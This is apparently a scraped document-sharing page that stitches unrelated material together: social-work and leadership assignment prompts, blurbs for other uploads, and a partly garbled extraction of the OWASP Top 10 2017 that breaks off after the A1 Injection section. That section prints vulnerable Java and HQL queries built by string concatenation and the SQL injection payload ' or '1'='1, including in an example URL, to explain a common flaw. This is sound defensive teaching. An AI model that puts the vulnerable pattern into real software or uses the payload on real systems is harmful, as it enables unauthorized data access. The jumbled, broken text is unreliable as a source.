You are a hospital social worker who is working with a family whose older adult relative is in end-stage renal failure. There are no advanced directives and the family is conflicted over what the next steps should be.
Scenario 2
You are a caseworker in a drug court. Your client has had three consecutive dirty urine analyses. She is unemployed and has violated her probation order.
Scenario 3
You are a school social worker. A teacher sends her 9-year-old student to you because he reports that he has not eaten in 2 days and there are no adults at home to take care of him.
Chart Example:
Your client, an 11-year-old girl, was removed from home because of parental substance abuse. She is acting out in her foster home, disobeying her foster parents and not following their rules.
Theory
Explanation for Scenario – please respond to the questions below in your explanation
Systems Theory
What systems need to be developed or put in place to support the child? Would Child Protective Services need to become involved? What other systems would support her and a successful outcome for being in foster care?
Generalist Theory
What is the best intervention or therapy to use based on this child’s situation? Given her circumstances, how could you best improve her functioning?
Behavioral Theory
What behaviors are being reinforced? What behaviors are being ignored or punished? What would you suggest to maintain this placement? Would this involve working with the foster parents?
Cognitive Theory
How would you help your client to examine her thinking, emotions, and behavior? What would this entail from a cognitive developmental framework?
Support your assignment with a minimum of three resources.
Length: 3 charts, not including title and reference pages
Your assignment should demonstrate thoughtful consideration of the ideas and concepts presented in the course by providing new thoughts and insights relating directly to this topic. Your response should reflect scholarly writing and current APA standards where appropriate. Be sure to adhere to Northcentral University's Academic Integrity Policy.
Assignement 3
State the function of each of the following musculoskeletal system structures: Describe the structures of the musculoskeletal system.
Skeletal muscle
Tendons
Ligaments
Bone
Cartilage
Describe each of the following types of joints:
Ball-and-socket
Hinge
Pivot
Gliding
Saddle
Condyloid
Newspaper Rubric
CATEGORY
4
3
2
1
Headline & Byline & images
16 points
Article has a .
· Assignment 2 Leader ProfileMany argue that the single largest v.docxgerardkortney
· Assignment 2: Leader Profile
Many argue that the single largest variable in organizational success is leadership. Effective leadership can transform an organization and create a positive environment for all stakeholders. In this assignment, you will have the chance to evaluate a leader and identify what makes him/her effective.
Consider all the leaders who have affected your life in some way. Think of people with whom you work—community leaders, a family member, or anyone who has had a direct impact on you.
· Choose one leader you consider to be effective. This can be a leader you are personally aware of, or someone you don’t know, but have observed to be an effective leader. Write a paper addressing the following:
· Explain how this leader has influenced you and why you think he or she is effective.
· Analyze what characteristics or qualities this person possesses that affected you most.
· Rate this leader by using a leadership scorecard. This can be a developed scorecard, or one you develop yourself. If you use a developed scorecard, please be sure to cite the sources of the scorecard. Once you have identified your scorecard, rate your leader. You decide what scores to include (for example, scale of 1–5, 5 being the highest) but be sure to assess the leader holistically across the critical leadership competencies you feel are most important (for example, visioning, empowering, strategy development and communication).
· Critique this individual’s skills against what you have learned about leadership so far in this course. Consider the following:
· How well does he/she meet the practices covered in your required readings?
· How well has he/she adapted to the challenges facing leaders today?
· If you could recommend changes to his/her leadership approach, philosophy, and style, what would you suggest? Why?
· Using the assigned readings, the Argosy University online library resources, and the Internet including general organizational sources like the Wall Street Journal, BusinessWeek, or Harvard Business Review, build a leadership profile of the leader you selected. Include information from personal experiences as well as general postings on the selected leader from Internet sources such as blogs. Be sure to include 2–3 additional resources not already included in the required readings in support of your leadership profile.
Write a 3–5-page paper in Word format. Apply APA standards to citation of sources. Use the following file naming convention: LastnameFirstInitial_M2_A2.doc.
By the due date assigned, deliver your assignment to the Submissions Area.
Assignment 2 Grading Criteria
Maximum Points
Explained how this leader has been influential and why you think the leader is effective showing analysis of the leader’s characteristics or qualities.
16
Analyzed the characteristics or qualities the leader possesses that have affected you most..
16
Rated your leader using a leadership scorecard and supported your rationale for your rating.
32
Criti.
· Assignment 1 Diversity Issues in Treating AddictionThe comple.docxgerardkortney
· Assignment 1: Diversity Issues in Treating Addiction
The complexities of working with diverse populations in treating disorders, such as addictions, require special considerations. Some approaches work better with some populations than with others. For example, Alcoholics Anonymous (AA) programs are spiritually based and focus on a higher power. Some populations have difficulty with these concepts and are averse to participating in such groups.
Select a population—for example, African Americans; Native Americans; or lesbians, gays, or bisexual individuals. Research your topic by using articles from the supplemental readings for this course or from other resources such as the Web, texts, experience, or other journal articles related to diversity issues and addictions.
Write a three- to five-page paper discussing the following:
· Some specific considerations for working with your chosen population in the area of addiction treatment
· Whether your research indicates that 12-step groups work with this population
· Any special problems associated with this population that make acknowledging the addiction and seeking treatment more difficult
· Any language or other barriers that this population faces when seeking treatment
Prepare your paper in Microsoft Word document format. Name your file M4_A1_LastName_Research.doc, and submit it to the Submissions Area by the due date assigned Follow APA guidelines for writing and citing text.
Assignment 1 Grading Criteria
Maximum Points
Discussed some specific considerations for working with your chosen population in the area of addiction.
8
Discussed whether your research indicates that 12-step groups work with your chosen population.
8
Discussed any special problems associated with this population that make acknowledging the addiction and seeking treatment more difficult .
8
Discussed any language or other barriers that this population faces when seeking treatment.
8
Wrote in a clear, concise, and organized manner; demonstrated ethical scholarship in accurate representation and attribution of sources, displayed accurate spelling, grammar, and punctuation.
4
Total:
36
· M4 Assignment 2 Discussion
Discussion Topic
Top of Form
Due February 9 at 11:59 PM
Bottom of Form
Assignment 2: Discussion Questions
Your facilitator will guide you in the selection of two of the three discussion questions. Submit your responses to these questions to the appropriate Discussion Area by the due date assigned. Through the end of the module, comment on the responses of others.
All written assignments and responses should follow APA rules for attributing sources.
You will be attempting two discussion questions in this module; each worth 28 points. The total number of points that can be earned for this assignment is 56.
Minority Groups
Many minority groups experience stress secondary to their social surroundings. For example, a family living in poverty may face frequent violence. Limited income makes meeting the day-to-day need.
Honest Reviews of Tim Han LMA Course Program.pptxtimhan337
Personal development courses are widely available today, with each one promising life-changing outcomes. Tim Han’s Life Mastery Achievers (LMA) Course has drawn a lot of interest. In addition to offering my frank assessment of Success Insider’s LMA Course, this piece examines the course’s effects via a variety of Tim Han LMA course reviews and Success Insider comments.
Synthetic Fiber Construction in lab .pptxPavel ( NSTU)
Synthetic fiber production is a fascinating and complex field that blends chemistry, engineering, and environmental science. By understanding these aspects, students can gain a comprehensive view of synthetic fiber production, its impact on society and the environment, and the potential for future innovations. Synthetic fibers play a crucial role in modern society, impacting various aspects of daily life, industry, and the environment. ynthetic fibers are integral to modern life, offering a range of benefits from cost-effectiveness and versatility to innovative applications and performance characteristics. While they pose environmental challenges, ongoing research and development aim to create more sustainable and eco-friendly alternatives. Understanding the importance of synthetic fibers helps in appreciating their role in the economy, industry, and daily life, while also emphasizing the need for sustainable practices and innovation.
The Roman Empire A Historical Colossus.pdfkaushalkr1407
The Roman Empire, a vast and enduring power, stands as one of history's most remarkable civilizations, leaving an indelible imprint on the world. It emerged from the Roman Republic, transitioning into an imperial powerhouse under the leadership of Augustus Caesar in 27 BCE. This transformation marked the beginning of an era defined by unprecedented territorial expansion, architectural marvels, and profound cultural influence.
The empire's roots lie in the city of Rome, founded, according to legend, by Romulus in 753 BCE. Over centuries, Rome evolved from a small settlement to a formidable republic, characterized by a complex political system with elected officials and checks on power. However, internal strife, class conflicts, and military ambitions paved the way for the end of the Republic. Julius Caesar’s dictatorship and subsequent assassination in 44 BCE created a power vacuum, leading to a civil war. Octavian, later Augustus, emerged victorious, heralding the Roman Empire’s birth.
Under Augustus, the empire experienced the Pax Romana, a 200-year period of relative peace and stability. Augustus reformed the military, established efficient administrative systems, and initiated grand construction projects. The empire's borders expanded, encompassing territories from Britain to Egypt and from Spain to the Euphrates. Roman legions, renowned for their discipline and engineering prowess, secured and maintained these vast territories, building roads, fortifications, and cities that facilitated control and integration.
The Roman Empire’s society was hierarchical, with a rigid class system. At the top were the patricians, wealthy elites who held significant political power. Below them were the plebeians, free citizens with limited political influence, and the vast numbers of slaves who formed the backbone of the economy. The family unit was central, governed by the paterfamilias, the male head who held absolute authority.
Culturally, the Romans were eclectic, absorbing and adapting elements from the civilizations they encountered, particularly the Greeks. Roman art, literature, and philosophy reflected this synthesis, creating a rich cultural tapestry. Latin, the Roman language, became the lingua franca of the Western world, influencing numerous modern languages.
Roman architecture and engineering achievements were monumental. They perfected the arch, vault, and dome, constructing enduring structures like the Colosseum, Pantheon, and aqueducts. These engineering marvels not only showcased Roman ingenuity but also served practical purposes, from public entertainment to water supply.
The French Revolution, which began in 1789, was a period of radical social and political upheaval in France. It marked the decline of absolute monarchies, the rise of secular and democratic republics, and the eventual rise of Napoleon Bonaparte. This revolutionary period is crucial in understanding the transition from feudalism to modernity in Europe.
For more information, visit-www.vavaclasses.com
A Strategic Approach: GenAI in EducationPeter Windle
Artificial Intelligence (AI) technologies such as Generative AI, Image Generators and Large Language Models have had a dramatic impact on teaching, learning and assessment over the past 18 months. The most immediate threat AI posed was to Academic Integrity with Higher Education Institutes (HEIs) focusing their efforts on combating the use of GenAI in assessment. Guidelines were developed for staff and students, policies put in place too. Innovative educators have forged paths in the use of Generative AI for teaching, learning and assessments leading to pockets of transformation springing up across HEIs, often with little or no top-down guidance, support or direction.
This Gasta posits a strategic approach to integrating AI into HEIs to prepare staff, students and the curriculum for an evolving world and workplace. We will highlight the advantages of working with these technologies beyond the realm of teaching, learning and assessment by considering prompt engineering skills, industry impact, curriculum changes, and the need for staff upskilling. In contrast, not engaging strategically with Generative AI poses risks, including falling behind peers, missed opportunities and failing to ensure our graduates remain employable. The rapid evolution of AI technologies necessitates a proactive and strategic approach if we are to remain relevant.
Acetabularia Information For Class 9 .docxvaibhavrinwa19
Acetabularia acetabulum is a single-celled green alga that in its vegetative state is morphologically differentiated into a basal rhizoid and an axially elongated stalk, which bears whorls of branching hairs. The single diploid nucleus resides in the rhizoid.
2024.06.01 Introducing a competency framework for languag learning materials ...Sandy Millin
http://sandymillin.wordpress.com/iateflwebinar2024
Published classroom materials form the basis of syllabuses, drive teacher professional development, and have a potentially huge influence on learners, teachers and education systems. All teachers also create their own materials, whether a few sentences on a blackboard, a highly-structured fully-realised online course, or anything in between. Despite this, the knowledge and skills needed to create effective language learning materials are rarely part of teacher training, and are mostly learnt by trial and error.
Knowledge and skills frameworks, generally called competency frameworks, for ELT teachers, trainers and managers have existed for a few years now. However, until I created one for my MA dissertation, there wasn’t one drawing together what we need to know and do to be able to effectively produce language learning materials.
This webinar will introduce you to my framework, highlighting the key competencies I identified from my research. It will also show how anybody involved in language teaching (any language, not just English!), teacher training, managing schools or developing language learning materials can benefit from using the framework.
Welcome to TechSoup New Member Orientation and Q&A (May 2024).pdfTechSoup
In this webinar you will learn how your organization can access TechSoup's wide variety of product discount and donation programs. From hardware to software, we'll give you a tour of the tools available to help your nonprofit with productivity, collaboration, financial management, donor tracking, security, and more.
June 3, 2024 Anti-Semitism Letter Sent to MIT President Kornbluth and MIT Cor...Levi Shapiro
Letter from the Congress of the United States regarding Anti-Semitism sent June 3rd to MIT President Sally Kornbluth, MIT Corp Chair, Mark Gorenberg
Dear Dr. Kornbluth and Mr. Gorenberg,
The US House of Representatives is deeply concerned by ongoing and pervasive acts of antisemitic
harassment and intimidation at the Massachusetts Institute of Technology (MIT). Failing to act decisively to ensure a safe learning environment for all students would be a grave dereliction of your responsibilities as President of MIT and Chair of the MIT Corporation.
This Congress will not stand idly by and allow an environment hostile to Jewish students to persist. The House believes that your institution is in violation of Title VI of the Civil Rights Act, and the inability or
unwillingness to rectify this violation through action requires accountability.
Postsecondary education is a unique opportunity for students to learn and have their ideas and beliefs challenged. However, universities receiving hundreds of millions of federal funds annually have denied
students that opportunity and have been hijacked to become venues for the promotion of terrorism, antisemitic harassment and intimidation, unlawful encampments, and in some cases, assaults and riots.
The House of Representatives will not countenance the use of federal funds to indoctrinate students into hateful, antisemitic, anti-American supporters of terrorism. Investigations into campus antisemitism by the Committee on Education and the Workforce and the Committee on Ways and Means have been expanded into a Congress-wide probe across all relevant jurisdictions to address this national crisis. The undersigned Committees will conduct oversight into the use of federal funds at MIT and its learning environment under authorities granted to each Committee.
• The Committee on Education and the Workforce has been investigating your institution since December 7, 2023. The Committee has broad jurisdiction over postsecondary education, including its compliance with Title VI of the Civil Rights Act, campus safety concerns over disruptions to the learning environment, and the awarding of federal student aid under the Higher Education Act.
• The Committee on Oversight and Accountability is investigating the sources of funding and other support flowing to groups espousing pro-Hamas propaganda and engaged in antisemitic harassment and intimidation of students. The Committee on Oversight and Accountability is the principal oversight committee of the US House of Representatives and has broad authority to investigate “any matter” at “any time” under House Rule X.
• The Committee on Ways and Means has been investigating several universities since November 15, 2023, when the Committee held a hearing entitled From Ivory Towers to Dark Corners: Investigating the Nexus Between Antisemitism, Tax-Exempt Universities, and Terror Financing. The Committee followed the hearing with letters to those institutions on January 10, 202
2. can be trusted.
At OWASP, you'll find free and open:
• Application security tools and standards.
• Complete books on application security testing, secure
code development, and secure code review.
• Presentations and videos.
• Cheat sheets on many common topics.
• Standard security controls and libraries.
• Local chapters worldwide.
• Cutting edge research.
• Extensive conferences worldwide.
• Mailing lists.
Learn more at: https://www.owasp.org.
All OWASP tools, documents, videos, presentations, and
chapters are free and open to anyone interested in improving
application security.
We advocate approaching application security as a people,
process, and technology problem, because the most
effective approaches to application security require
improvements in these areas.
OWASP is a new kind of organization. Our freedom from
commercial pressures allows us to provide unbiased,
3. practical, and cost-effective information about application
security.
OWASP is not affiliated with any technology company,
although we support the informed use of commercial security
technology. OWASP produces many types of materials in a
collaborative, transparent, and open way.
The OWASP Foundation is the non-profit entity that ensures
the project's long-term success. Almost everyone associated
with OWASP is a volunteer, including the OWASP board,
chapter leaders, project leaders, and project members.
We support innovative security research with grants and
infrastructure.
Come join us!
TOC Table of Contents
TOC - About OWASP ……………………………… 1
FW - Foreword …………..………………...……… 2
I - Introduction ………..……………….……..… 3
RN - Release Notes …………..………….…..….. 4
4. Risk - Application Security Risks…………….…… 5
T10 - OWASP Top 10 Application Security
Risks – 2017 …………..……….....….…… 6
A1:2017 - Injection …….………..……………………… 7
A2:2017 - Broken Authentication ……………………... 8
A3:2017 - Sensitive Data Exposure ………………….. 9
A4:2017 - XML External Entities (XXE) ……………... 10
A5:2017 - Broken Access Control ……………...…….. 11
A6:2017 - Security Misconfiguration ………………….. 12
A7:2017 - Cross-Site Scripting (XSS) ….…………….. 13
A8:2017 - Insecure Deserialization ……………………14
A9:2017 - Using Components with Known
Vulnerabilities .……………………………… 15
A10:2017 - Insufficient Logging & Monitoring….…..….. 16
+D - What’s Next for Developers ….………..….. 17
+T - What’s Next for Security Testers .……..….. 18
+O - What’s Next for Organizations ….....…….... 19
+A - What’s Next for Application Managers ...... 20
5. +R - Note About Risks ……..……………………. 21
+RF - Details About Risk Factors ……………..…. 22
+DAT - Methodology and Data …..………………… 23
+ACK - Acknowledgements ………………..………. 24
http://creativecommons.org/licenses/by-sa/3.0/
https://www.youtube.com/user/OWASPGLOBAL
https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series
https://www.owasp.org/index.php/OWASP_Chapter
https://www.owasp.org/index.php/Category:OWASP_AppSec_C
onference
https://lists.owasp.org/mailman/listinfo
https://www.owasp.org
2
Foreword
Insecure software is undermining our financial, healthcare,
defense, energy, and other critical infrastructure. As our
software
becomes increasingly complex, and connected, the difficulty of
achieving application security increases exponentially. The
rapid pace of modern software development processes makes the
most common risks essential to discover and resolve
quickly and accurately. We can no longer afford to tolerate
relatively simple security problems like those presented in this
6. OWASP Top 10.
A great deal of feedback was received during the creation of the
OWASP Top 10 - 2017, more than for any other equivalent
OWASP effort. This shows how much passion the community
has for the OWASP Top 10, and thus how critical it is for
OWASP to get the Top 10 right for the majority of use cases.
Although the original goal of the OWASP Top 10 project was
simply to raise awareness amongst developers and managers,
it has become the de facto application security standard.
In this release, issues and recommendations are written
concisely and in a testable way to assist with the adoption of the
OWASP Top 10 in application security programs. We encourage
large and high performing organizations to use the OWASP
Application Security Verification Standard (ASVS) if a true
standard is required, but for most, the OWASP Top 10 is a great
start on the application security journey.
We have written up a range of suggested next steps for different
users of the OWASP Top 10, including What’s Next for
Developers, What’s Next for Security Testers, What’s Next for
Organizations, which is suitable for CIOs and CISOs, and
What’s Next for Application Managers, which is suitable for
application managers or anyone responsible for the lifecycle of
the application.
7. In the long term, we encourage all software development teams
and organizations to create an application security program
that is compatible with your culture and technology. These
programs come in all shapes and sizes. Leverage your
organization's existing strengths to measure and improve your
application security program using the Software Assurance
Maturity Model.
We hope that the OWASP Top 10 is useful to your application
security efforts. Please don't hesitate to contact OWASP with
your questions, comments, and ideas at our GitHub project
repository:
• https://github.com/OWASP/Top10/issues
You can find the OWASP Top 10 project and translations here:
• https://www.owasp.org/index.php/top10
Lastly, we wish to thank the founding leadership of the OWASP
Top 10 project, Dave Wichers and Jeff Williams, for all their
efforts, and believing in us to get this finished with the
community's help. Thank you!
• Andrew van der Stock
• Brian Glas
• Neil Smithline
8. • Torsten Gigler
Project Sponsorship
Thanks to Autodesk for sponsoring the OWASP Top 10 - 2017.
Organizations and individuals that have provided vulnerability
prevalence data or other assistance are listed on the
Acknowledgements page.
FW Foreword
https://www.owasp.org/index.php/Category:OWASP_Applicatio
n_Security_Verification_Standard_Project
https://www.owasp.org/index.php/OWASP_SAMM_Project
https://github.com/OWASP/Top10/issues
https://www.owasp.org/index.php/top10
https://www.autodesk.com/
3
Welcome to the OWASP Top 10 - 2017!
This major update adds several new issues, including two issues
selected by the community - A8:2017-Insecure
Deserialization and A10:2017-Insufficient Logging and
Monitoring. Two key differentiators from previous OWASP Top
10
releases are the substantial community feedback and extensive
data assembled from dozens of organizations, possibly the
largest amount of data ever assembled in the preparation of an
9. application security standard. This provides us with
confidence that the new OWASP Top 10 addresses the most
impactful application security risks currently facing
organizations.
The OWASP Top 10 - 2017 is based primarily on 40+ data
submissions from firms that specialize in application security
and
an industry survey that was completed by over 500 individuals.
This data spans vulnerabilities gathered from hundreds of
organizations and over 100,000 real-world applications and
APIs. The Top 10 items are selected and prioritized according
to
this prevalence data, in combination with consensus estimates
of exploitability, detectability, and impact.
A primary aim of the OWASP Top 10 is to educate developers,
designers, architects, managers, and organizations about the
consequences of the most common and most important web
application security weaknesses. The Top 10 provides basic
techniques to protect against these high risk problem areas, and
provides guidance on where to go from here.
Roadmap for future activities
Don't stop at 10. There are hundreds of issues that could
affect the overall security of a web application as discussed
10. in the OWASP Developer's Guide and the OWASP Cheat
Sheet Series. These are essential reading for anyone
developing web applications and APIs. Guidance on how to
effectively find vulnerabilities in web applications and APIs
is provided in the OWASP Testing Guide.
Constant change. The OWASP Top 10 will continue to
change. Even without changing a single line of your
application's code, you may become vulnerable as new
flaws are discovered and attack methods are refined.
Please review the advice at the end of the Top 10 in What's
Next For Developers, Security Testers, Organizations, and
Application Managers for more information.
Think positive. When you're ready to stop chasing
vulnerabilities and focus on establishing strong application
security controls, the OWASP Proactive Controls project
provides a starting point to help developers build security
into their application and the OWASP Application Security
Verification Standard (ASVS) is a guide for organizations
11. and application reviewers on what to verify.
Use tools wisely. Security vulnerabilities can be quite
complex and deeply buried in code. In many cases, the
most cost-effective approach for finding and eliminating
these weaknesses is human experts armed with advanced
tools. Relying on tools alone provides a false sense of
security and is not recommended.
Push left, right, and everywhere. Focus on making
security an integral part of your culture throughout your
development organization. Find out more in the OWASP
Software Assurance Maturity Model (SAMM).
Attribution
We'd like to thank the organizations that contributed their
vulnerability data to support the 2017 update. We received
more than 40 responses to the call for data. For the first
time, all the data contributed to a Top 10 release, and the full
list of contributors is publicly available. We believe this is one
of the larger, more diverse collections of vulnerability data
12. ever publicly collected.
As there are more contributors than space here, we have
created a dedicated page to recognize the contributions
made. We wish to give heartfelt thanks to these
organizations for being willing to be on the front lines by
publicly sharing vulnerability data from their efforts. We hope
this will continue to grow and encourage more organizations
to do the same and possibly be seen as one of the key
milestones of evidence-based security. The OWASP Top 10
would not be possible without these amazing contributions.
A big thank you to the more than 500 individuals who took
the time to complete the industry ranked survey. Your voice
helped determine two new additions to the Top 10. The
additional comments, notes of encouragement,
and criticisms were all appreciated. We know your time is
valuable and we wanted to say thanks.
We would like to thank those individuals who have
contributed significant constructive comments and time
reviewing this update to the Top 10. As much as possible,
13. we have listed them on the ‘Acknowledgements’ page.
And finally, we'd like to thank in advance all the translators
out there who will translate this release of the Top 10 into
numerous different languages, helping to make the OWASP
Top 10 more accessible to the entire planet.
I Introduction
https://www.owasp.org/index.php/OWASP_Guide_Project
https://www.owasp.org/index.php/OWASP_Cheat_Sheet_Series
https://www.owasp.org/index.php/OWASP_Testing_Project
https://www.owasp.org/index.php/OWASP_Proactive_Controls
https://www.owasp.org/index.php/ASVS
https://www.owasp.org/index.php/OWASP_SAMM_Project
4
What changed from 2013 to 2017?
Change has accelerated over the last four years, and the
OWASP Top 10 needed to change. We've completely refactored
the
OWASP Top 10, revamped the methodology, utilized a new data
call process, worked with the community, re-ordered our risks,
re-
written each risk from the ground up, and added references to
frameworks and languages that are now commonly used.
Over the last few years, the fundamental technology and
architecture of applications has changed significantly:
14. • Microservices written in node.js and Spring Boot are replacing
traditional monolithic applications. Microservices come with
their
own security challenges including establishing trust between
microservices, containers, secret management, etc. Old code
never
expected to be accessible from the Internet is now sitting behind
an API or RESTful web service to be consumed by Single Page
Applications (SPAs) and mobile applications. Architectural
assumptions by the code, such as trusted callers, are no longer
valid.
• Single page applications, written in JavaScript frameworks
such as Angular and React, allow the creation of highly modular
feature-rich front ends. Client-side functionality that has
traditionally been delivered server-side brings its own security
challenges.
• JavaScript is now the primary language of the web with
node.js running server side and modern web frameworks such as
Bootstrap, Electron, Angular, and React running on the client.
New issues, supported by data:
• A4:2017-XML External Entities (XXE) is a new category
primarily supported by source code analysis security testing
tools
(SAST) data sets.
New issues, supported by the community:
We asked the community to provide insight into two forward
looking weakness categories. After over 500 peer submissions,
and
removing issues that were already supported by data (such as
Sensitive Data Exposure and XXE), the two new issues are:
15. • A8:2017-Insecure Deserialization, which permits remote code
execution or sensitive object manipulation on affected
platforms.
• A10:2017-Insufficient Logging and Monitoring, the lack of
which can prevent or significantly delay malicious activity and
breach
detection, incident response, and digital forensics.
Merged or retired, but not forgotten:
• A4-Insecure Direct Object References and A7-Missing
Function Level Access Control merged into A5:2017-Broken
Access
Control.
• A8-Cross-Site Request Forgery (CSRF), as many frameworks
include CSRF defenses, it was found in only 5% of applications.
• A10-Unvalidated Redirects and Forwards, while found in
approximately 8% of applications, it was edged out overall by
XXE.
OWASP Top 10 - - 2017
A1 – -Injection
A2 –
A2:2017-Broken Authentication
A3 – Cross- -Sensitive Data
Exposure
A4 – Insecure Direct Object References [Merged+A7] ∪
A4:2017-XML External Entities (XXE) [NEW]
16. A5 – -Broken Access
Control [Merged]
A6 – -Security
Misconfiguration
A7 – Missing Function Level Access Contr [Merged+A4] ∪
A7:2017-Cross-Site Scripting (XSS)
A8 – Cross-Site Request -Insecure
Deserialization [NEW, Community]
A9 –
A9:2017-Using Components with Known Vulnerabilities
A10 – -
Insufficient Logging&Monitoring [NEW,Comm.]
RN Release Notes
https://www.owasp.org/index.php/Source_Code_Analysis_Tools
https://www.owasp.org/index.php/Cross-
Site_Request_Forgery_(CSRF)
5
What Are Application Security Risks?
Attackers can potentially use many different paths through your
application to do harm to your business or organization. Each
of these paths represents a risk that may, or may not, be serious
enough to warrant attention.
Sometimes these paths are trivial to find and exploit, and
sometimes they are extremely difficult. Similarly, the harm that
17. is
caused may be of no consequence, or it may put you out of
business. To determine the risk to your organization, you can
evaluate the likelihood associated with each threat agent, attack
vector, and security weakness and combine it with an
estimate of the technical and business impact to your
organization. Together, these factors determine your overall
risk.
Weakness
Attack
Threat
Agents
ImpactWeakness
Attack
Attack
Vectors
Security
Weaknesses
Technical
Impacts
Business
Impacts
Attack
Impact
18. Impact
Asset
Function
Asset
Weakness
Control
Control
ControlWeakness
Security
Controls
Risk Application Security Risks
What’s My Risk?
The OWASP Top 10 focuses on identifying the most serious
web application
security risks for a broad array of organizations. For each of
these risks, we
provide generic information about likelihood and technical
impact using the
following simple ratings scheme, which is based on the OWASP
Risk Rating
Methodology.
In this edition, we have updated the risk rating system to assist
in calculating the
likelihood and impact of any given risk. For more details,
please see Note About
19. Risks.
Each organization is unique, and so are the threat actors for that
organization,
their goals, and the impact of any breach. If a public interest
organization uses a
content management system (CMS) for public information and a
health system
uses that same exact CMS for sensitive health records, the
threat actors and
business impacts can be very different for the same software. It
is critical to
understand the risk to your organization based on applicable
threat agents and
business impacts.
Where possible, the names of the risks in the Top 10 are aligned
with Common
Weakness Enumeration (CWE) weaknesses to promote generally
accepted
naming conventions and to reduce confusion.
Threat
Agents
Exploitability
Weakness
Prevalence
Weakness
Detectability
Technical
20. Impacts
Business
Impacts
Appli-
cation
Specific
Easy: 3 Widespread: 3 Easy: 3 Severe: 3
Business
Specific
Average: 2 Common: 2 Average: 2 Moderate: 2
Difficult: 1 Uncommon: 1 Difficult: 1 Minor: 1
References
OWASP
• OWASP Risk Rating Methodology
• Article on Threat/Risk Modeling
External
• ISO 31000: Risk Management Std
• ISO 27001: ISMS
21. • NIST Cyber Framework (US)
• ASD Strategic Mitigations (AU)
• NIST CVSS 3.0
• Microsoft Threat Modelling Tool
https://www.owasp.org/index.php/Top_10
https://www.owasp.org/index.php/OWASP_Risk_Rating_Metho
dology
https://cwe.mitre.org/data/definitions/22.html
https://www.owasp.org/index.php/OWASP_Risk_Rating_Metho
dology
https://www.owasp.org/index.php/Threat_Risk_Modeling
https://www.iso.org/iso-31000-risk-management.html
https://www.iso.org/isoiec-27001-information-security.html
https://www.nist.gov/cyberframework
https://www.asd.gov.au/infosec/mitigationstrategies.htm
https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator
https://www.microsoft.com/en-
us/download/details.aspx?id=49168
6
T10 OWASP Top 10Application Security Risks – 2017
Injection flaws, such as SQL, NoSQL, OS, and LDAP injection,
occur when untrusted data is sent
to an interpreter as part of a command or query. The attacker’s
hostile data can trick the
interpreter into executing unintended commands or accessing
data without proper authorization.
A1:2017-
Injection
22. Application functions related to authentication and session
management are often implemented
incorrectly, allowing attackers to compromise passwords, keys,
or session tokens, or to exploit
other implementation flaws to assume other users’ identities
temporarily or permanently.
A2:2017-Broken
Authentication
Many web applications and APIs do not properly protect
sensitive data, such as financial,
healthcare, and PII. Attackers may steal or modify such weakly
protected data to conduct credit
card fraud, identity theft, or other crimes. Sensitive data may be
compromised without extra
protection, such as encryption at rest or in transit, and requires
special precautions when
exchanged with the browser.
A3:2017-
Sensitive Data
Exposure
Many older or poorly configured XML processors evaluate
external entity references within XML
documents. External entities can be used to disclose internal
files using the file URI handler,
internal file shares, internal port scanning, remote code
execution, and denial of service attacks.
A4:2017-XML
External
23. Entities (XXE)
Restrictions on what authenticated users are allowed to do are
often not properly enforced.
Attackers can exploit these flaws to access unauthorized
functionality and/or data, such as access
other users' accounts, view sensitive files, modify other users’
data, change access rights, etc.
A5:2017-Broken
Access Control
Security misconfiguration is the most commonly seen issue.
This is commonly a result of insecure
default configurations, incomplete or ad hoc configurations,
open cloud storage, misconfigured
HTTP headers, and verbose error messages containing sensitive
information. Not only must all
operating systems, frameworks, libraries, and applications be
securely configured, but they must
be patched and upgraded in a timely fashion.
XSS flaws occur whenever an application includes untrusted
data in a new web page without
proper validation or escaping, or updates an existing web page
with user-supplied data using a
browser API that can create HTML or JavaScript. XSS allows
attackers to execute scripts in the
victim’s browser which can hijack user sessions, deface web
sites, or redirect the user to
malicious sites.
A7:2017-
Cross-Site
Scripting (XSS)
24. Insecure deserialization often leads to remote code execution.
Even if deserialization flaws do not
result in remote code execution, they can be used to perform
attacks, including replay attacks,
injection attacks, and privilege escalation attacks.
A8:2017-
Insecure
Deserialization
Components, such as libraries, frameworks, and other software
modules, run with the same
privileges as the application. If a vulnerable component is
exploited, such an attack can facilitate
serious data loss or server takeover. Applications and APIs
using components with known
vulnerabilities may undermine application defenses and enable
various attacks and impacts.
A9:2017-Using
Components
with Known
Vulnerabilities
Insufficient logging and monitoring, coupled with missing or
ineffective integration with incident
response, allows attackers to further attack systems, maintain
persistence, pivot to more systems,
and tamper, extract, or destroy data. Most breach studies show
time to detect a breach is over
200 days, typically detected by external parties rather than
internal processes or monitoring.
25. A10:2017-
Insufficient
Logging &
Monitoring
A6:2017-Security
Misconfiguration
App. Specific Business ?
7
Impacts
Threat
Agents
Attack
Vectors
Security
Weakness
Example Attack Scenarios
Scenario #1: An application uses untrusted data in the
construction of the following vulnerable SQL call:
String query = "SELECT * FROM accounts WHERE
custID='" + request.getParameter("id") + "'";
Scenario #2: Similarly, an application’s blind trust in
frameworks
26. may result in queries that are still vulnerable, (e.g. Hibernate
Query Language (HQL)):
Query HQLQuery = session.createQuery("FROM accounts
WHERE custID='" + request.getParameter("id") + "'");
In both cases, the attacker modifies the ‘id’ parameter value in
their browser to send: ' or '1'='1. For example:
http://example.com/app/accountView?id=' or '1'='1
This changes the meaning of both queries to return all the
records from the accounts table. More dangerous attacks could
modify or delete data, or even invoke stored procedures.
Is the Application Vulnerable?
An application is vulnerable to attack when:
• User-supplied data is not validated, filtered, or sanitized by
the
application.
• Dynamic queries or non-parameterized calls without context-
aware escaping are used directly in the interpreter.
• Hostile data is used within object-relational mapping (ORM)
search parameters to extract additional, sensitive records.
• Hostile data is directly used or concatenated, such that the
SQL or command contains both structure and hostile data in
dynamic queries, commands, or stored procedures.
Some of the more common injections are SQL, NoSQL, OS
command, Object Relational Mapping (ORM), LDAP, and
Expression Language (EL) or Object Graph Navigation Library
(OGNL) injection. The concept is identical among all
27. interpreters.
Source code review is the best method of detecting if
applications are vulnerable to injections, closely followed by
thorough automated testing of all parameters, headers, URL,
cookies, JSON, SOAP, and XML data inputs. Organizations can
include static source (SAST) and dynamic application test
(DAST) tools into the CI/CD pipeline to identify newly
introduced
injection flaws prior to production deployment.
References
OWASP
• OWASP Proactive Controls: Parameterize Queries
• OWASP ASVS: V5 Input Validation and Encoding
• OWASP Testing Guide: SQL Injection, Command Injection,
ORM injection
• OWASP Cheat Sheet: Injection Prevention
• OWASP Cheat Sheet: SQL Injection Prevention
• OWASP Cheat Sheet: Injection Prevention in Java
